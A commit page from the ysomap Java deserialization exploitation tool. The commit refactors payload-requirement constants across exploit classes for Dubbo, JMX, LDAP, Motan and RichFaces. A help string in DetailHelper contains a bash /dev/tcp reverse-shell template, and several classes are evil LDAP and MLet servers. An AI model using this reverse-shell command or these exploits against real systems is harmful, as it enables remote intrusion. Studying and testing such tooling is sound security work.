Skip to content

Commit

Permalink
update
Browse files Browse the repository at this point in the history
  • Loading branch information
@wh1t3p1g
wh1t3p1g committed Oct 14, 2023
1 parent 01ea810 commit 0abdcf7
Show file tree
Hide file tree
Showing 28 changed files with 67 additions and 205 deletions.
31 changes: 21 additions & 10 deletions cli/src/main/java/ysomap/cli/Console.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -23,6 +23,7 @@
import ysomap.common.util.ColorStyle;
import ysomap.common.util.Logger;
import ysomap.core.serializer.SerializerTypeCodes;
import ysomap.core.util.DetailHelper;

import java.io.File;
import java.io.IOException;
Expand Down Expand Up @@ -346,7 +347,7 @@ public void set() throws Exception {
}

public void list() throws ArgumentsMissMatchException {
if (args.size() == 0) {
if (args.isEmpty()) {
Printer.printExploitsInfo(exploits.values());
Printer.printPayloadsInfo(payloads.values());
Printer.printBulletsInfo(bullets.values());
Expand Down Expand Up @@ -509,16 +510,26 @@ public void help() {
}

// 如果可选项仅有一个,那么自动设置payload或bullet
public void autoSetPayloadOrBullet(String type, Class clazz) throws Exception {
public void autoSetPayloadOrBullet(String type, Class<?> clazz) throws Exception {
List<String> candidates = Arrays.asList(Require.Utils.getRequiresFromClass(clazz));
if (candidates.size() == 1 && !candidates.get(0).equalsIgnoreCase("*") && !candidates.get(0).equalsIgnoreCase("all gadgets") && !candidates.get(0).equals("")) {
Logger.normal(String.format("Auto set %s [%s]", type, ColorStyle.makeWordRedAndBoldAndUnderline(candidates.get(0))));
List<String> list = new ArrayList<>();
list.add(type);
list.add(candidates.get(0));
args = list;
use();
}
if(candidates.size() != 1) return;

String candidate = candidates.get(0);
if(DetailHelper.ALL_PAYLOAD.equals(candidate)
|| DetailHelper.ALL_JAVA_PAYLOAD.equals(candidate)
|| DetailHelper.ALL_HESSIAN_PAYLOAD.equals(candidate)
|| DetailHelper.NO_NEED_PAYLOAD.equals(candidate)
) return;

Logger.normal(
String.format("Auto set %s [%s]", type,
ColorStyle.makeWordRedAndBoldAndUnderline(candidate)));

List<String> list = new ArrayList<>();
list.add(type);
list.add(candidate);
args = list;
use();
}

// 过滤筛选
Expand Down
2 changes: 1 addition & 1 deletion cli/src/main/java/ysomap/cli/utils/Printer.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -47,7 +47,7 @@ public static void printSessions(String curSession, Map<String, Session> session

public static void printCandidates(String type, Class<?> clazz, boolean detail, Map<String, MetaData> dataMap){
List<String> candidates = Arrays.asList(Require.Utils.getRequiresFromClass(clazz));
if(candidates.size() > 0){
if(!candidates.isEmpty()){
String c = collect(candidates);
Logger.normal("You can choose "+type+": "+c);
if(detail){
Expand Down
5 changes: 5 additions & 0 deletions core/src/main/java/ysomap/core/util/DetailHelper.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,11 @@ public class DetailHelper {
"2. reverse shell: /bin/bash -i >& /dev/tcp/x.x.x.x/port 0>&1<br>" +
"3. if not work, try to encode the command. https://jackson-t.ca/runtime-exec-payloads.html<br>";

public final static String ALL_PAYLOAD = "Any Payload";
public final static String NO_NEED_PAYLOAD = "Do not need Payload";
public final static String ALL_JAVA_PAYLOAD = "Any Java Serialization Payload";
public final static String ALL_HESSIAN_PAYLOAD = "Any Hessian Serialization Payload";

public final static String BODY =
"根据effect类型填充body内容,分别如下:<br>" +
"1. default, body=command<br>" +
Expand Down
92 changes: 0 additions & 92 deletions core/src/main/java/ysomap/core/util/JarHelper.java
View file

This file was deleted.

8 changes: 2 additions & 6 deletions core/src/main/java/ysomap/exploits/dubbo/DubboRPC2Exploit.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,9 +6,9 @@
import ysomap.common.annotation.*;
import ysomap.common.util.Status;
import ysomap.core.util.ByteHelper;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.SocketHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
Expand All @@ -23,7 +23,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {}, param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Details("dubbo rpc 反序列化漏洞")
public class DubboRPC2Exploit extends AbstractExploit {

Expand All @@ -47,10 +47,6 @@ public class DubboRPC2Exploit extends AbstractExploit {
@Require(name = "paramTypes", detail = "可利用的service method 参数类型列表,使用,分隔")
public String paramTypes = null;

// @NotNull
public Payload payload;
public String payloadName;

@Override
public void work() {
try {
Expand Down
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/dubbo/DubboRPC3Exploit.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@
import ysomap.common.util.Status;
import ysomap.core.serializer.Serializer;
import ysomap.core.util.ByteHelper;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.SocketHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;
Expand All @@ -21,7 +22,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("dubbo rpc 反序列化漏洞")
public class DubboRPC3Exploit extends AbstractExploit {

Expand Down
10 changes: 3 additions & 7 deletions core/src/main/java/ysomap/exploits/dubbo/DubboRPCExploit.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,9 +6,9 @@
import ysomap.common.util.Status;
import ysomap.core.serializer.hessian.NoWriteReplaceSerializerFactory;
import ysomap.core.util.ByteHelper;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.SocketHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
Expand All @@ -21,7 +21,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {}, param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Details("dubbo rpc 反序列化漏洞")
public class DubboRPCExploit extends AbstractExploit {

Expand All @@ -33,14 +33,10 @@ public class DubboRPCExploit extends AbstractExploit {
@Require(name = "port", type = "int",detail = "目标端口")
public String port = "20880";

@NotNull
public Payload payload;
public String payloadName;

@Override
public void work() {
try {
byte[] data = generateRequest(payload.getObject());
byte[] data = generateRequest(null);
// byte[] data = generateRequest("test");
String ret = SocketHelper.send(host, Integer.parseInt(port), data, 5000);
System.out.println(ret);
Expand Down
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/jmx/JMXEvilMLetServer.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@
import ysomap.common.util.Logger;
import ysomap.common.util.Status;
import ysomap.core.util.ClassFiles;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.HTTPHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.exploits.jmx.component.MLetPayload;
Expand All @@ -23,7 +24,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Details("Startup a SimpleHttpServer with JMX MLet.xml and MBean.jar files.\n" +
"建立一个挂载了JMX MLet.xml文件和MBean.jar文件的HTTP服务。")
public class JMXEvilMLetServer extends AbstractExploit {
Expand Down
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/jmx/JMXInvokeMBean.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@
import ysomap.common.annotation.*;
import ysomap.common.util.Logger;
import ysomap.common.util.Status;
import ysomap.core.util.DetailHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;

Expand All @@ -21,7 +22,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {"all gadgets"}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("Exploit a JMX server with specific payload.\n" +
"攻击一个JMX服务器,需要设定指定的payload。如果当前JMX服务器需要认证,则攻击前需设定用户名密码。")
public class JMXInvokeMBean extends AbstractExploit {
Expand Down
2 changes: 1 addition & 1 deletion core/src/main/java/ysomap/exploits/jmx/JMXMLetExploit.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,7 @@
@SuppressWarnings({"unchecked"})
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD},param = false)
@Details("针对无认证且未设置security manager的JMX服务,允许加载MLet形式外部MBean。\n" +
"通过设置exploit(JMXEvilMletServer),使得目标JMX服务载入外部MBean。\n" +
"当前exploit需要配合`JMXEvilMletServer`.")
Expand Down
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/ldap/LDAPLocalChainListener.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,6 +8,7 @@
import ysomap.common.util.Status;
import ysomap.core.serializer.Serializer;
import ysomap.core.serializer.SerializerFactory;
import ysomap.core.util.DetailHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.exploits.ldap.component.LocalChainOperationInterceptor;
import ysomap.payloads.Payload;
Expand All @@ -24,7 +25,7 @@
@SuppressWarnings({"rawtypes"})
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {"all gadgets"}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("Start up a Evil LDAP server with some payloads.\n" +
"\n" +
"建立一个LDAP服务,攻击外来连接的LDAP客户端,使得客户端对当前设置的payload进行反序列化。\n" +
Expand Down
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/ldap/LDAPRefListener.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@
import ysomap.common.util.Logger;
import ysomap.common.util.Status;
import ysomap.common.util.Strings;
import ysomap.core.util.DetailHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.exploits.ldap.component.OperationInterceptor;

Expand All @@ -20,7 +21,7 @@
*/
@Exploits
@Authors({Authors.MBECHLER})
@Require(bullets = {"evil http server"}, param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Dependencies({"com.sun.jndi.ldap.object.trustURLCodebase=true"})
@Details("Start up a Evil LDAP server with reference.\r\n" +
"建立一个LDAP服务,对外来连接的客户端返回构造好的reference对象。\n" +
Expand Down
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,7 @@
import ysomap.common.util.Strings;
import ysomap.core.serializer.Serializer;
import ysomap.core.serializer.SerializerFactory;
import ysomap.core.util.DetailHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.exploits.ldap.component.LocalChainOperationInterceptor;

Expand All @@ -25,7 +26,7 @@
*/
@Exploits
@Authors({Authors.KINGX})
@Require(bullets = {"*"}, param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Dependencies({"tomcat el"})
@Details("Jndi reference 依赖tomcat BeanFactory,实现EL表达式执行")
public class LDAPTomcatRefListener extends AbstractExploit {
Expand Down
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/motan/MotanRPCExploit.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,7 @@
import ysomap.core.serializer.Serializer;
import ysomap.core.serializer.SerializerFactory;
import ysomap.core.util.ByteHelper;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.SocketHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;
Expand All @@ -21,7 +22,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {}, param = false)
@Require(bullets = {DetailHelper.ALL_PAYLOAD}, param = false)
@Details("motan rpc 反序列化漏洞")
public class MotanRPCExploit extends AbstractExploit {

Expand Down
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/objects/DoubleDeserializePayloadGenerator.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@
import ysomap.common.util.Status;
import ysomap.core.serializer.Serializer;
import ysomap.core.serializer.SerializerFactory;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.PayloadHelper;
import ysomap.core.util.ReflectionHelper;
import ysomap.exploits.AbstractExploit;
Expand All @@ -18,7 +19,7 @@

@Exploits
@Authors({Authors.WH1T3P1G, Authors.whocansee})
@Require(bullets = {"Any Java Serialization Payload"}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("用于二次封装恶意序列化数据,触发二次反序列化")
public class DoubleDeserializePayloadGenerator extends AbstractExploit {

Expand Down
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/richfaces/RichFacesExploit.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,7 @@
import ysomap.common.annotation.*;
import ysomap.common.util.Status;
import ysomap.core.serializer.Serializer;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.HTTPHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;
Expand All @@ -16,7 +17,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {"all gadgets"}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("Richfaces 反序列化漏洞exploit,CVE-2013-2165")
public class RichFacesExploit extends AbstractExploit {

Expand Down
Loading

0 comments on commit 0abdcf7

Please sign in to comment.